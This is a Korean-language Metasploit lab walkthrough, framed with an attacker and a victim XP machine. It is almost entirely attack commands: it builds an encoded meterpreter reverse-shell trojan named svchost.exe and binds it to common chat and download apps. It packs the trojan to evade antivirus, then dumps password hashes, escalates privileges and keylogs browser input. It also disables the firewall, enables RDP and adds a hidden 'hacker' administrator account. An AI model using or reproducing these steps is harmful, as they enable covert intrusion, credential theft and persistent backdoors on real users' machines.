- 실습환경-
공격자 : 192.168.102.137 (BT 시스템) , 공격자용 xp ( package merging system )
희생자 : 192.168.102.135 (xp 시스템)
1)
bt>cd /pentest/exploits/framework3
bt>svn update
bt>./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.102.136 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/svchost.exe
or
bt>./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.102.136 LPORT=4444 x > /var/www/reverse_tcp.exe
2)
생성된 파일을 공격용 XP에 이동시켜 네이트온 / 파일구리 등 일반적인 응용프로그램과 결합
iexpress 이용
AV 우회를 위해 필요시 themida같은 도구를 이용
3)
bt>./msfconsole
msf>use exploit/multi/handler
msf>exploit(handler) >set PAYLOAD windows/meterpreter/reverse_tcp
msf>exploit(handler) >set LHOST 192.168.102.136
msf>exploit(handler) > exploit
4)
패킹/크립팅된 트로이목마 실행
5)
meterpreter > ipconfig
meterpreter > hashdump
meterpreter > ps
meterpreter > migrate 680
meterpreter > getsystem
meterpreter > sysinfo
meterpreter > shell
6)
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0
/f
7)
netsh firewall set opmode disable
netsh firewall set portopening tcp 3389 redesktop
net user hacker hacker /add
net localgroup administrators hacker /add
8)meterpreter > screenshot
9)
meterpreter > ps
iexplorer.exe --> pid 확인 (ex 416 )
meterpreter > migrate 416
meterpreter > keyscan_start
meterpreter > keyscan_dump
--> ie 상에서의 입력이 키로킹됨.
meterpreter > keyscan_stop
10)rdesktop -u hacker -p hacker 192.168.102.135:3389
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444
LHOST=192.168.1.83 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
생성되는 코드 라인 복사
에디터 open 후
Attrib +h shellcodeexec.x32.exe
shellcodeexec.x32 생성된 코드 라인 붙여 넣기
저장명 attack.bat
저장 후 bat to exe converter 를 이용하여 attack.bat 를 attack.exe 로 변경
option 에서 invisiable application 으로 변경 후 add 를 선택하여 windows/meterpreter 에서
shellcodeexec.x32.exe 찾아서 지정 후 compile
#cd /pentest/exploits/framework3 && ./msfconsole
msf> use multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 192.168.1.83
msf > set exitfunc thead
msf > set exitonsession false
msf > exploit -j / 않되면 j 하지말것
희생자가 생성된 shell.exe 를 실행하게 되면 game over.
meterprerter>sysinfo